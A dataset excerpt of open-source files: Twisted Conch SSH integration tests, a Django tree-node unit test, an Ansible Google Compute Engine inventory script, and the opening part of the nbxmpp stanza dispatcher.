repo_name stringlengths 6 100 | path stringlengths 4 294 | copies stringlengths 1 5 | size stringlengths 4 6 | content stringlengths 606 896k | license stringclasses 15
values |
|---|---|---|---|---|---|
Architektor/PySnip | venv/lib/python2.7/site-packages/twisted/conch/test/test_conch.py | 2 | 20891 | # -*- test-case-name: twisted.conch.test.test_conch -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
import os, sys, socket
from itertools import count
from zope.interface import implementer
from twisted.cred import portal
from twisted.internet import reactor, defer, protocol
from twisted.internet.error import ProcessExitedAlready
from twisted.internet.task import LoopingCall
from twisted.internet.utils import getProcessValue
from twisted.python import log, runtime
from twisted.trial import unittest
from twisted.conch.error import ConchError
from twisted.conch.avatar import ConchUser
from twisted.conch.ssh.session import ISession, SSHSession, wrapProtocol
try:
from twisted.conch.scripts.conch import SSHSession as StdioInteractingSession
except ImportError, e:
StdioInteractingSession = None
_reason = str(e)
del e
from twisted.conch.test.test_ssh import ConchTestRealm
from twisted.python.procutils import which
from twisted.conch.test.keydata import publicRSA_openssh, privateRSA_openssh
from twisted.conch.test.keydata import publicDSA_openssh, privateDSA_openssh
try:
from twisted.conch.test.test_ssh import ConchTestServerFactory, \
conchTestPublicKeyChecker
except ImportError:
pass
try:
import cryptography
except ImportError:
cryptography = None
try:
import pyasn1
except ImportError:
pyasn1 = None
class FakeStdio(object):
"""
A fake for testing L{twisted.conch.scripts.conch.SSHSession.eofReceived} and
L{twisted.conch.scripts.cftp.SSHSession.eofReceived}.
@ivar writeConnLost: A flag which records whether L{loserWriteConnection}
has been called.
"""
writeConnLost = False
def loseWriteConnection(self):
"""
Record the call to loseWriteConnection.
"""
self.writeConnLost = True
class StdioInteractingSessionTests(unittest.TestCase):
"""
Tests for L{twisted.conch.scripts.conch.SSHSession}.
"""
if StdioInteractingSession is None:
skip = _reason
def test_eofReceived(self):
"""
L{twisted.conch.scripts.conch.SSHSession.eofReceived} loses the
write half of its stdio connection.
"""
stdio = FakeStdio()
channel = StdioInteractingSession()
channel.stdio = stdio
channel.eofReceived()
self.assertTrue(stdio.writeConnLost)
class Echo(protocol.Protocol):
def connectionMade(self):
log.msg('ECHO CONNECTION MADE')
def connectionLost(self, reason):
log.msg('ECHO CONNECTION DONE')
def dataReceived(self, data):
self.transport.write(data)
if '\n' in data:
self.transport.loseConnection()
class EchoFactory(protocol.Factory):
protocol = Echo
class ConchTestOpenSSHProcess(protocol.ProcessProtocol):
"""
Test protocol for launching an OpenSSH client process.
@ivar deferred: Set by whatever uses this object. Accessed using
L{_getDeferred}, which destroys the value so the Deferred is not
fired twice. Fires when the process is terminated.
"""
deferred = None
buf = ''
def _getDeferred(self):
d, self.deferred = self.deferred, None
return d
def outReceived(self, data):
self.buf += data
def processEnded(self, reason):
"""
Called when the process has ended.
@param reason: a Failure giving the reason for the process' end.
"""
if reason.value.exitCode != 0:
self._getDeferred().errback(
ConchError("exit code was not 0: %s" %
reason.value.exitCode))
else:
buf = self.buf.replace('\r\n', '\n')
self._getDeferred().callback(buf)
class ConchTestForwardingProcess(protocol.ProcessProtocol):
"""
Manages a third-party process which launches a server.
Uses L{ConchTestForwardingPort} to connect to the third-party server.
Once L{ConchTestForwardingPort} has disconnected, kill the process and fire
a Deferred with the data received by the L{ConchTestForwardingPort}.
@ivar deferred: Set by whatever uses this object. Accessed using
L{_getDeferred}, which destroys the value so the Deferred is not
fired twice. Fires when the process is terminated.
"""
deferred = None
def __init__(self, port, data):
"""
@type port: C{int}
@param port: The port on which the third-party server is listening.
(it is assumed that the server is running on localhost).
@type data: C{str}
@param data: This is sent to the third-party server. Must end with '\n'
in order to trigger a disconnect.
"""
self.port = port
self.buffer = None
self.data = data
def _getDeferred(self):
d, self.deferred = self.deferred, None
return d
def connectionMade(self):
self._connect()
def _connect(self):
"""
Connect to the server, which is often a third-party process.
Tries to reconnect if it fails because we have no way of determining
exactly when the port becomes available for listening -- we can only
know when the process starts.
"""
cc = protocol.ClientCreator(reactor, ConchTestForwardingPort, self,
self.data)
d = cc.connectTCP('127.0.0.1', self.port)
d.addErrback(self._ebConnect)
return d
def _ebConnect(self, f):
reactor.callLater(.1, self._connect)
def forwardingPortDisconnected(self, buffer):
"""
The network connection has died; save the buffer of output
from the network and attempt to quit the process gracefully,
and then (after the reactor has spun) send it a KILL signal.
"""
self.buffer = buffer
self.transport.write('\x03')
self.transport.loseConnection()
reactor.callLater(0, self._reallyDie)
def _reallyDie(self):
try:
self.transport.signalProcess('KILL')
except ProcessExitedAlready:
pass
def processEnded(self, reason):
"""
Fire the Deferred at self.deferred with the data collected
from the L{ConchTestForwardingPort} connection, if any.
"""
self._getDeferred().callback(self.buffer)
class ConchTestForwardingPort(protocol.Protocol):
"""
Connects to server launched by a third-party process (managed by
L{ConchTestForwardingProcess}) sends data, then reports whatever it
received back to the L{ConchTestForwardingProcess} once the connection
is ended.
"""
def __init__(self, protocol, data):
"""
@type protocol: L{ConchTestForwardingProcess}
@param protocol: The L{ProcessProtocol} which made this connection.
@type data: str
@param data: The data to be sent to the third-party server.
"""
self.protocol = protocol
self.data = data
def connectionMade(self):
self.buffer = ''
self.transport.write(self.data)
def dataReceived(self, data):
self.buffer += data
def connectionLost(self, reason):
self.protocol.forwardingPortDisconnected(self.buffer)
def _makeArgs(args, mod="conch"):
start = [sys.executable, '-c'
"""
### Twisted Preamble
import sys, os
path = os.path.abspath(sys.argv[0])
while os.path.dirname(path) != path:
if os.path.basename(path).startswith('Twisted'):
sys.path.insert(0, path)
break
path = os.path.dirname(path)
from twisted.conch.scripts.%s import run
run()""" % mod]
return start + list(args)
class ConchServerSetupMixin:
if not cryptography:
skip = "can't run without cryptography"
if not pyasn1:
skip = "Cannot run without PyASN1"
realmFactory = staticmethod(lambda: ConchTestRealm('testuser'))
def _createFiles(self):
for f in ['rsa_test','rsa_test.pub','dsa_test','dsa_test.pub',
'kh_test']:
if os.path.exists(f):
os.remove(f)
open('rsa_test','w').write(privateRSA_openssh)
open('rsa_test.pub','w').write(publicRSA_openssh)
open('dsa_test.pub','w').write(publicDSA_openssh)
open('dsa_test','w').write(privateDSA_openssh)
os.chmod('dsa_test', 33152)
os.chmod('rsa_test', 33152)
open('kh_test','w').write('127.0.0.1 '+publicRSA_openssh)
def _getFreePort(self):
s = socket.socket()
s.bind(('', 0))
port = s.getsockname()[1]
s.close()
return port
def _makeConchFactory(self):
"""
Make a L{ConchTestServerFactory}, which allows us to start a
L{ConchTestServer} -- i.e. an actually listening conch.
"""
realm = self.realmFactory()
p = portal.Portal(realm)
p.registerChecker(conchTestPublicKeyChecker())
factory = ConchTestServerFactory()
factory.portal = p
return factory
def setUp(self):
self._createFiles()
self.conchFactory = self._makeConchFactory()
self.conchFactory.expectedLoseConnection = 1
self.conchServer = reactor.listenTCP(0, self.conchFactory,
interface="127.0.0.1")
self.echoServer = reactor.listenTCP(0, EchoFactory())
self.echoPort = self.echoServer.getHost().port
self.echoServerV6 = reactor.listenTCP(0, EchoFactory(), interface="::1")
self.echoPortV6 = self.echoServerV6.getHost().port
def tearDown(self):
try:
self.conchFactory.proto.done = 1
except AttributeError:
pass
else:
self.conchFactory.proto.transport.loseConnection()
return defer.gatherResults([
defer.maybeDeferred(self.conchServer.stopListening),
defer.maybeDeferred(self.echoServer.stopListening),
defer.maybeDeferred(self.echoServerV6.stopListening)])
class ForwardingMixin(ConchServerSetupMixin):
"""
Template class for tests of the Conch server's ability to forward arbitrary
protocols over SSH.
These tests are integration tests, not unit tests. They launch a Conch
server, a custom TCP server (just an L{EchoProtocol}) and then call
L{execute}.
L{execute} is implemented by subclasses of L{ForwardingMixin}. It should
cause an SSH client to connect to the Conch server, asking it to forward
data to the custom TCP server.
"""
def test_exec(self):
"""
Test that we can use whatever client to send the command "echo goodbye"
to the Conch server. Make sure we receive "goodbye" back from the
server.
"""
d = self.execute('echo goodbye', ConchTestOpenSSHProcess())
return d.addCallback(self.assertEqual, 'goodbye\n')
def test_localToRemoteForwarding(self):
"""
Test that we can use whatever client to forward a local port to a
specified port on the server.
"""
localPort = self._getFreePort()
process = ConchTestForwardingProcess(localPort, 'test\n')
d = self.execute('', process,
sshArgs='-N -L%i:127.0.0.1:%i'
% (localPort, self.echoPort))
d.addCallback(self.assertEqual, 'test\n')
return d
def test_remoteToLocalForwarding(self):
"""
Test that we can use whatever client to forward a port from the server
to a port locally.
"""
localPort = self._getFreePort()
process = ConchTestForwardingProcess(localPort, 'test\n')
d = self.execute('', process,
sshArgs='-N -R %i:127.0.0.1:%i'
% (localPort, self.echoPort))
d.addCallback(self.assertEqual, 'test\n')
return d
# Conventionally there is a separate adapter object which provides ISession for
# the user, but making the user provide ISession directly works too. This isn't
# a full implementation of ISession though, just enough to make these tests
# pass.
@implementer(ISession)
class RekeyAvatar(ConchUser):
"""
This avatar implements a shell which sends 60 numbered lines to whatever
connects to it, then closes the session with a 0 exit status.
60 lines is selected as being enough to send more than 2kB of traffic, the
amount the client is configured to initiate a rekey after.
"""
def __init__(self):
ConchUser.__init__(self)
self.channelLookup['session'] = SSHSession
def openShell(self, transport):
"""
Write 60 lines of data to the transport, then exit.
"""
proto = protocol.Protocol()
proto.makeConnection(transport)
transport.makeConnection(wrapProtocol(proto))
# Send enough bytes to the connection so that a rekey is triggered in
# the client.
def write(counter):
i = counter()
if i == 60:
call.stop()
transport.session.conn.sendRequest(
transport.session, 'exit-status', '\x00\x00\x00\x00')
transport.loseConnection()
else:
transport.write("line #%02d\n" % (i,))
# The timing for this loop is an educated guess (and/or the result of
# experimentation) to exercise the case where a packet is generated
# mid-rekey. Since the other side of the connection is (so far) the
# OpenSSH command line client, there's no easy way to determine when the
# rekey has been initiated. If there were, then generating a packet
# immediately at that time would be a better way to test the
# functionality being tested here.
call = LoopingCall(write, count().next)
call.start(0.01)
def closed(self):
"""
Ignore the close of the session.
"""
class RekeyRealm:
"""
This realm gives out new L{RekeyAvatar} instances for any avatar request.
"""
def requestAvatar(self, avatarID, mind, *interfaces):
return interfaces[0], RekeyAvatar(), lambda: None
class RekeyTestsMixin(ConchServerSetupMixin):
"""
TestCase mixin which defines tests exercising L{SSHTransportBase}'s handling
of rekeying messages.
"""
realmFactory = RekeyRealm
def test_clientRekey(self):
"""
After a client-initiated rekey is completed, application data continues
to be passed over the SSH connection.
"""
process = ConchTestOpenSSHProcess()
d = self.execute("", process, '-o RekeyLimit=2K')
def finished(result):
self.assertEqual(
result,
'\n'.join(['line #%02d' % (i,) for i in range(60)]) + '\n')
d.addCallback(finished)
return d
class OpenSSHClientMixin:
if not which('ssh'):
skip = "no ssh command-line client available"
def execute(self, remoteCommand, process, sshArgs=''):
"""
Connects to the SSH server started in L{ConchServerSetupMixin.setUp} by
running the 'ssh' command line tool.
@type remoteCommand: str
@param remoteCommand: The command (with arguments) to run on the
remote end.
@type process: L{ConchTestOpenSSHProcess}
@type sshArgs: str
@param sshArgs: Arguments to pass to the 'ssh' process.
@return: L{defer.Deferred}
"""
# PubkeyAcceptedKeyTypes does not exist prior to OpenSSH 7.0 so we
# first need to check if we can set it. If we can, -V will just print
# the version without doing anything else; if we can't, we will get a
# configuration error.
d = getProcessValue(
'ssh', ('-o', 'PubkeyAcceptedKeyTypes=ssh-dss', '-V'))
def hasPAKT(status):
if status == 0:
opts = '-oPubkeyAcceptedKeyTypes=ssh-dss '
else:
opts = ''
process.deferred = defer.Deferred()
# Pass -F /dev/null to avoid the user's configuration file from
# being loaded, as it may contain settings that cause our tests to
# fail or hang.
cmdline = ('ssh -2 -l testuser -p %i '
'-F /dev/null '
'-oUserKnownHostsFile=kh_test '
'-oPasswordAuthentication=no '
# Always use the RSA key, since that's the one in kh_test.
'-oHostKeyAlgorithms=ssh-rsa '
'-a '
'-i dsa_test ') + opts + sshArgs + \
' 127.0.0.1 ' + remoteCommand
port = self.conchServer.getHost().port
cmds = (cmdline % port).split()
reactor.spawnProcess(process, "ssh", cmds)
return process.deferred
return d.addCallback(hasPAKT)
class OpenSSHKeyExchangeTestCase(ConchServerSetupMixin, OpenSSHClientMixin,
unittest.TestCase):
"""
Tests L{SSHTransportBase}'s key exchange algorithm compatibility with
OpenSSH.
"""
def assertExecuteWithKexAlgorithm(self, keyExchangeAlgo):
"""
Call execute() method of L{OpenSSHClientMixin} with an ssh option that
forces the exclusive use of the key exchange algorithm specified by
keyExchangeAlgo
@type keyExchangeAlgo: C{str}
@param keyExchangeAlgo: The key exchange algorithm to use
@return: L{defer.Deferred}
"""
d = self.execute('echo hello', ConchTestOpenSSHProcess(),
'-oKexAlgorithms=' + keyExchangeAlgo)
return d.addCallback(self.assertEqual, 'hello\n')
def test_DH_GROUP1(self):
"""
The diffie-hellman-group1-sha1 key exchange algorithm is compatible
with OpenSSH.
"""
return self.assertExecuteWithKexAlgorithm(
'diffie-hellman-group1-sha1')
def test_DH_GROUP14(self):
"""
The diffie-hellman-group14-sha1 key exchange algorithm is compatible
with OpenSSH.
"""
return self.assertExecuteWithKexAlgorithm(
'diffie-hellman-group14-sha1')
def test_DH_GROUP_EXCHANGE_SHA1(self):
"""
The diffie-hellman-group-exchange-sha1 key exchange algorithm is
compatible with OpenSSH.
"""
return self.assertExecuteWithKexAlgorithm(
'diffie-hellman-group-exchange-sha1')
def test_DH_GROUP_EXCHANGE_SHA256(self):
"""
The diffie-hellman-group-exchange-sha256 key exchange algorithm is
compatible with OpenSSH.
"""
return self.assertExecuteWithKexAlgorithm(
'diffie-hellman-group-exchange-sha256')
class OpenSSHClientForwardingTests(ForwardingMixin, OpenSSHClientMixin,
unittest.TestCase):
"""
Connection forwarding tests run against the OpenSSL command line client.
"""
def test_localToRemoteForwardingV6(self):
"""
Forwarding of arbitrary IPv6 TCP connections via SSH.
"""
localPort = self._getFreePort()
process = ConchTestForwardingProcess(localPort, 'test\n')
d = self.execute('', process,
sshArgs='-N -L%i:[::1]:%i'
% (localPort, self.echoPortV6))
d.addCallback(self.assertEqual, 'test\n')
return d
class OpenSSHClientRekeyTests(RekeyTestsMixin, OpenSSHClientMixin,
unittest.TestCase):
"""
Rekeying tests run against the OpenSSL command line client.
"""
class CmdLineClientTests(ForwardingMixin, unittest.TestCase):
"""
Connection forwarding tests run against the Conch command line client.
"""
if runtime.platformType == 'win32':
skip = "can't run cmdline client on win32"
def execute(self, remoteCommand, process, sshArgs=''):
"""
As for L{OpenSSHClientTestCase.execute}, except it runs the 'conch'
command line tool, not 'ssh'.
"""
process.deferred = defer.Deferred()
port = self.conchServer.getHost().port
cmd = ('-p %i -l testuser '
'--known-hosts kh_test '
'--user-authentications publickey '
'--host-key-algorithms ssh-rsa '
'-a '
'-i dsa_test '
'-v ') % port + sshArgs + \
' 127.0.0.1 ' + remoteCommand
cmds = _makeArgs(cmd.split())
log.msg(str(cmds))
env = os.environ.copy()
env['PYTHONPATH'] = os.pathsep.join(sys.path)
reactor.spawnProcess(process, sys.executable, cmds, env=env)
return process.deferred
| gpl-3.0 |
hottwaj/django | tests/utils_tests/test_tree.py | 429 | 1951 | import copy
import unittest
from django.utils.tree import Node
class NodeTests(unittest.TestCase):
def setUp(self):
self.node1_children = [('a', 1), ('b', 2)]
self.node1 = Node(self.node1_children)
self.node2 = Node()
def test_str(self):
self.assertEqual(str(self.node1), "(DEFAULT: ('a', 1), ('b', 2))")
self.assertEqual(str(self.node2), "(DEFAULT: )")
def test_repr(self):
self.assertEqual(repr(self.node1),
"<Node: (DEFAULT: ('a', 1), ('b', 2))>")
self.assertEqual(repr(self.node2), "<Node: (DEFAULT: )>")
def test_len(self):
self.assertEqual(len(self.node1), 2)
self.assertEqual(len(self.node2), 0)
def test_bool(self):
self.assertTrue(self.node1)
self.assertFalse(self.node2)
def test_contains(self):
self.assertIn(('a', 1), self.node1)
self.assertNotIn(('a', 1), self.node2)
def test_add(self):
# start with the same children of node1 then add an item
node3 = Node(self.node1_children)
node3_added_child = ('c', 3)
# add() returns the added data
self.assertEqual(node3.add(node3_added_child, Node.default),
node3_added_child)
# we added exactly one item, len() should reflect that
self.assertEqual(len(self.node1) + 1, len(node3))
self.assertEqual(str(node3), "(DEFAULT: ('a', 1), ('b', 2), ('c', 3))")
def test_negate(self):
# negated is False by default
self.assertFalse(self.node1.negated)
self.node1.negate()
self.assertTrue(self.node1.negated)
self.node1.negate()
self.assertFalse(self.node1.negated)
def test_deepcopy(self):
node4 = copy.copy(self.node1)
node5 = copy.deepcopy(self.node1)
self.assertIs(self.node1.children, node4.children)
self.assertIsNot(self.node1.children, node5.children)
| bsd-3-clause |
saada/ansible | plugins/inventory/gce.py | 13 | 10489 | #!/usr/bin/env python
# Copyright 2013 Google Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
'''
GCE external inventory script
=================================
Generates inventory that Ansible can understand by making API requests
Google Compute Engine via the libcloud library. Full install/configuration
instructions for the gce* modules can be found in the comments of
ansible/test/gce_tests.py.
When run against a specific host, this script returns the following variables
based on the data obtained from the libcloud Node object:
- gce_uuid
- gce_id
- gce_image
- gce_machine_type
- gce_private_ip
- gce_public_ip
- gce_name
- gce_description
- gce_status
- gce_zone
- gce_tags
- gce_metadata
- gce_network
When run in --list mode, instances are grouped by the following categories:
- zone:
zone group name examples are us-central1-b, europe-west1-a, etc.
- instance tags:
An entry is created for each tag. For example, if you have two instances
with a common tag called 'foo', they will both be grouped together under
the 'tag_foo' name.
- network name:
the name of the network is appended to 'network_' (e.g. the 'default'
network will result in a group named 'network_default')
- machine type
types follow a pattern like n1-standard-4, g1-small, etc.
- running status:
group name prefixed with 'status_' (e.g. status_running, status_stopped,..)
- image:
when using an ephemeral/scratch disk, this will be set to the image name
used when creating the instance (e.g. debian-7-wheezy-v20130816). when
your instance was created with a root persistent disk it will be set to
'persistent_disk' since there is no current way to determine the image.
Examples:
Execute uname on all instances in the us-central1-a zone
$ ansible -i gce.py us-central1-a -m shell -a "/bin/uname -a"
Use the GCE inventory script to print out instance specific information
$ plugins/inventory/gce.py --host my_instance
Author: Eric Johnson <erjohnso@google.com>
Version: 0.0.1
'''
__requires__ = ['pycrypto>=2.6']
try:
import pkg_resources
except ImportError:
# Use pkg_resources to find the correct versions of libraries and set
# sys.path appropriately when there are multiversion installs. We don't
# fail here as there is code that better expresses the errors where the
# library is used.
pass
USER_AGENT_PRODUCT="Ansible-gce_inventory_plugin"
USER_AGENT_VERSION="v1"
import sys
import os
import argparse
import ConfigParser
try:
import json
except ImportError:
import simplejson as json
try:
from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
_ = Provider.GCE
except:
print("GCE inventory script requires libcloud >= 0.13")
sys.exit(1)
class GceInventory(object):
def __init__(self):
# Read settings and parse CLI arguments
self.parse_cli_args()
self.driver = self.get_gce_driver()
# Just display data for specific host
if self.args.host:
print self.json_format_dict(self.node_to_dict(
self.get_instance(self.args.host)),
pretty=self.args.pretty)
sys.exit(0)
# Otherwise, assume user wants all instances grouped
print(self.json_format_dict(self.group_instances(),
pretty=self.args.pretty))
sys.exit(0)
def get_gce_driver(self):
"""Determine the GCE authorization settings and return a
libcloud driver.
"""
gce_ini_default_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "gce.ini")
gce_ini_path = os.environ.get('GCE_INI_PATH', gce_ini_default_path)
# Create a ConfigParser.
# This provides empty defaults to each key, so that environment
# variable configuration (as opposed to INI configuration) is able
# to work.
config = ConfigParser.SafeConfigParser(defaults={
'gce_service_account_email_address': '',
'gce_service_account_pem_file_path': '',
'gce_project_id': '',
'libcloud_secrets': '',
})
if 'gce' not in config.sections():
config.add_section('gce')
config.read(gce_ini_path)
# Attempt to get GCE params from a configuration file, if one
# exists.
secrets_path = config.get('gce', 'libcloud_secrets')
secrets_found = False
try:
import secrets
args = list(getattr(secrets, 'GCE_PARAMS', []))
kwargs = getattr(secrets, 'GCE_KEYWORD_PARAMS', {})
secrets_found = True
except:
pass
if not secrets_found and secrets_path:
if not secrets_path.endswith('secrets.py'):
err = "Must specify libcloud secrets file as "
err += "/absolute/path/to/secrets.py"
print(err)
sys.exit(1)
sys.path.append(os.path.dirname(secrets_path))
try:
import secrets
args = list(getattr(secrets, 'GCE_PARAMS', []))
kwargs = getattr(secrets, 'GCE_KEYWORD_PARAMS', {})
secrets_found = True
except:
pass
if not secrets_found:
args = [
config.get('gce','gce_service_account_email_address'),
config.get('gce','gce_service_account_pem_file_path')
]
kwargs = {'project': config.get('gce', 'gce_project_id')}
# If the appropriate environment variables are set, they override
# other configuration; process those into our args and kwargs.
args[0] = os.environ.get('GCE_EMAIL', args[0])
args[1] = os.environ.get('GCE_PEM_FILE_PATH', args[1])
kwargs['project'] = os.environ.get('GCE_PROJECT', kwargs['project'])
# Retrieve and return the GCE driver.
gce = get_driver(Provider.GCE)(*args, **kwargs)
gce.connection.user_agent_append(
'%s/%s' % (USER_AGENT_PRODUCT, USER_AGENT_VERSION),
)
return gce
def parse_cli_args(self):
''' Command line argument processing '''
parser = argparse.ArgumentParser(
description='Produce an Ansible Inventory file based on GCE')
parser.add_argument('--list', action='store_true', default=True,
help='List instances (default: True)')
parser.add_argument('--host', action='store',
help='Get all information about an instance')
parser.add_argument('--pretty', action='store_true', default=False,
help='Pretty format (default: False)')
self.args = parser.parse_args()
def node_to_dict(self, inst):
md = {}
if inst is None:
return {}
if inst.extra['metadata'].has_key('items'):
for entry in inst.extra['metadata']['items']:
md[entry['key']] = entry['value']
net = inst.extra['networkInterfaces'][0]['network'].split('/')[-1]
return {
'gce_uuid': inst.uuid,
'gce_id': inst.id,
'gce_image': inst.image,
'gce_machine_type': inst.size,
'gce_private_ip': inst.private_ips[0],
'gce_public_ip': inst.public_ips[0] if len(inst.public_ips) >= 1 else None,
'gce_name': inst.name,
'gce_description': inst.extra['description'],
'gce_status': inst.extra['status'],
'gce_zone': inst.extra['zone'].name,
'gce_tags': inst.extra['tags'],
'gce_metadata': md,
'gce_network': net,
# Hosts don't have a public name, so we add an IP
'ansible_ssh_host': inst.public_ips[0] if len(inst.public_ips) >= 1 else inst.private_ips[0]
}
def get_instance(self, instance_name):
'''Gets details about a specific instance '''
try:
return self.driver.ex_get_node(instance_name)
except Exception, e:
return None
def group_instances(self):
'''Group all instances'''
groups = {}
meta = {}
meta["hostvars"] = {}
for node in self.driver.list_nodes():
name = node.name
meta["hostvars"][name] = self.node_to_dict(node)
zone = node.extra['zone'].name
if groups.has_key(zone): groups[zone].append(name)
else: groups[zone] = [name]
tags = node.extra['tags']
for t in tags:
tag = 'tag_%s' % t
if groups.has_key(tag): groups[tag].append(name)
else: groups[tag] = [name]
net = node.extra['networkInterfaces'][0]['network'].split('/')[-1]
net = 'network_%s' % net
if groups.has_key(net): groups[net].append(name)
else: groups[net] = [name]
machine_type = node.size
if groups.has_key(machine_type): groups[machine_type].append(name)
else: groups[machine_type] = [name]
image = node.image and node.image or 'persistent_disk'
if groups.has_key(image): groups[image].append(name)
else: groups[image] = [name]
status = node.extra['status']
stat = 'status_%s' % status.lower()
if groups.has_key(stat): groups[stat].append(name)
else: groups[stat] = [name]
groups["_meta"] = meta
return groups
def json_format_dict(self, data, pretty=False):
''' Converts a dict to a JSON object and dumps it as a formatted
string '''
if pretty:
return json.dumps(data, sort_keys=True, indent=2)
else:
return json.dumps(data)
# Run the script
GceInventory()
| gpl-3.0 |
gajim/python-nbxmpp | nbxmpp/dispatcher.py | 1 | 19414 | # Copyright (C) 2019 Philipp Hörist <philipp AT hoerist.com>
#
# This file is part of nbxmpp.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; If not, see <http://www.gnu.org/licenses/>.
import logging
import re
import time
from xml.parsers.expat import ExpatError
from gi.repository import GLib
from nbxmpp.simplexml import NodeBuilder
from nbxmpp.simplexml import Node
from nbxmpp.namespaces import Namespace
from nbxmpp.protocol import NodeProcessed
from nbxmpp.protocol import InvalidFrom
from nbxmpp.protocol import InvalidJid
from nbxmpp.protocol import InvalidStanza
from nbxmpp.protocol import Iq
from nbxmpp.protocol import Presence
from nbxmpp.protocol import Message
from nbxmpp.protocol import Protocol
from nbxmpp.protocol import Error
from nbxmpp.protocol import StreamErrorNode
from nbxmpp.protocol import ERR_FEATURE_NOT_IMPLEMENTED
from nbxmpp.modules.eme import EME
from nbxmpp.modules.http_auth import HTTPAuth
from nbxmpp.modules.presence import BasePresence
from nbxmpp.modules.message import BaseMessage
from nbxmpp.modules.iq import BaseIq
from nbxmpp.modules.nickname import Nickname
from nbxmpp.modules.delay import Delay
from nbxmpp.modules.muc import MUC
from nbxmpp.modules.idle import Idle
from nbxmpp.modules.pgplegacy import PGPLegacy
from nbxmpp.modules.vcard_avatar import VCardAvatar
from nbxmpp.modules.captcha import Captcha
from nbxmpp.modules.entity_caps import EntityCaps
from nbxmpp.modules.blocking import Blocking
from nbxmpp.modules.pubsub import PubSub
from nbxmpp.modules.activity import Activity
from nbxmpp.modules.tune import Tune
from nbxmpp.modules.mood import Mood
from nbxmpp.modules.location import Location
from nbxmpp.modules.user_avatar import UserAvatar
from nbxmpp.modules.bookmarks.private_bookmarks import PrivateBookmarks
from nbxmpp.modules.bookmarks.pep_bookmarks import PEPBookmarks
from nbxmpp.modules.bookmarks.native_bookmarks import NativeBookmarks
from nbxmpp.modules.openpgp import OpenPGP
from nbxmpp.modules.omemo import OMEMO
from nbxmpp.modules.annotations import Annotations
from nbxmpp.modules.muclumbus import Muclumbus
from nbxmpp.modules.software_version import SoftwareVersion
from nbxmpp.modules.adhoc import AdHoc
from nbxmpp.modules.ibb import IBB
from nbxmpp.modules.discovery import Discovery
from nbxmpp.modules.chat_markers import ChatMarkers
from nbxmpp.modules.receipts import Receipts
from nbxmpp.modules.oob import OOB
from nbxmpp.modules.correction import Correction
from nbxmpp.modules.attention import Attention
from nbxmpp.modules.security_labels import SecurityLabels
from nbxmpp.modules.chatstates import Chatstates
from nbxmpp.modules.register import Register
from nbxmpp.modules.http_upload import HTTPUpload
from nbxmpp.modules.mam import MAM
from nbxmpp.modules.vcard_temp import VCardTemp
from nbxmpp.modules.vcard4 import VCard4
from nbxmpp.modules.ping import Ping
from nbxmpp.modules.delimiter import Delimiter
from nbxmpp.modules.roster import Roster
from nbxmpp.modules.last_activity import LastActivity
from nbxmpp.modules.entity_time import EntityTime
from nbxmpp.modules.misc import unwrap_carbon
from nbxmpp.modules.misc import unwrap_mam
from nbxmpp.util import get_properties_struct
from nbxmpp.util import get_invalid_xml_regex
from nbxmpp.util import is_websocket_close
from nbxmpp.util import is_websocket_stream_error
from nbxmpp.util import Observable
from nbxmpp.util import LogAdapter
log = logging.getLogger('nbxmpp.dispatcher')
class StanzaDispatcher(Observable):
"""
Dispatches stanzas to handlers
Signals:
before-dispatch
parsing-error
stream-end
"""
def __init__(self, client):
Observable.__init__(self, log)
self._client = client
self._modules = {}
self._parser = None
self._websocket_stream_error = None
self._log = LogAdapter(log, {'context': client.log_context})
self._handlers = {}
self._id_callbacks = {}
self._dispatch_callback = None
self._timeout_id = None
self._stanza_types = {
'iq': Iq,
'message': Message,
'presence': Presence,
'error': StreamErrorNode,
}
self.invalid_chars_re = get_invalid_xml_regex()
self._register_namespace('unknown')
self._register_namespace(Namespace.STREAMS)
self._register_namespace(Namespace.CLIENT)
self._register_protocol('iq', Iq)
self._register_protocol('presence', Presence)
self._register_protocol('message', Message)
self._register_modules()
def set_dispatch_callback(self, callback):
self._log.info('Set dispatch callback: %s', callback)
self._dispatch_callback = callback
def get_module(self, name):
return self._modules[name]
def _register_modules(self):
self._modules['BasePresence'] = BasePresence(self._client)
self._modules['BaseMessage'] = BaseMessage(self._client)
self._modules['BaseIq'] = BaseIq(self._client)
self._modules['EME'] = EME(self._client)
self._modules['HTTPAuth'] = HTTPAuth(self._client)
self._modules['Nickname'] = Nickname(self._client)
self._modules['MUC'] = MUC(self._client)
self._modules['Delay'] = Delay(self._client)
self._modules['Captcha'] = Captcha(self._client)
self._modules['Idle'] = Idle(self._client)
self._modules['PGPLegacy'] = PGPLegacy(self._client)
self._modules['VCardAvatar'] = VCardAvatar(self._client)
self._modules['EntityCaps'] = EntityCaps(self._client)
self._modules['Blocking'] = Blocking(self._client)
self._modules['PubSub'] = PubSub(self._client)
self._modules['Mood'] = Mood(self._client)
self._modules['Activity'] = Activity(self._client)
self._modules['Tune'] = Tune(self._client)
self._modules['Location'] = Location(self._client)
self._modules['UserAvatar'] = UserAvatar(self._client)
self._modules['PrivateBookmarks'] = PrivateBookmarks(self._client)
self._modules['PEPBookmarks'] = PEPBookmarks(self._client)
self._modules['NativeBookmarks'] = NativeBookmarks(self._client)
self._modules['OpenPGP'] = OpenPGP(self._client)
self._modules['OMEMO'] = OMEMO(self._client)
self._modules['Annotations'] = Annotations(self._client)
self._modules['Muclumbus'] = Muclumbus(self._client)
self._modules['SoftwareVersion'] = SoftwareVersion(self._client)
self._modules['AdHoc'] = AdHoc(self._client)
self._modules['IBB'] = IBB(self._client)
self._modules['Discovery'] = Discovery(self._client)
self._modules['ChatMarkers'] = ChatMarkers(self._client)
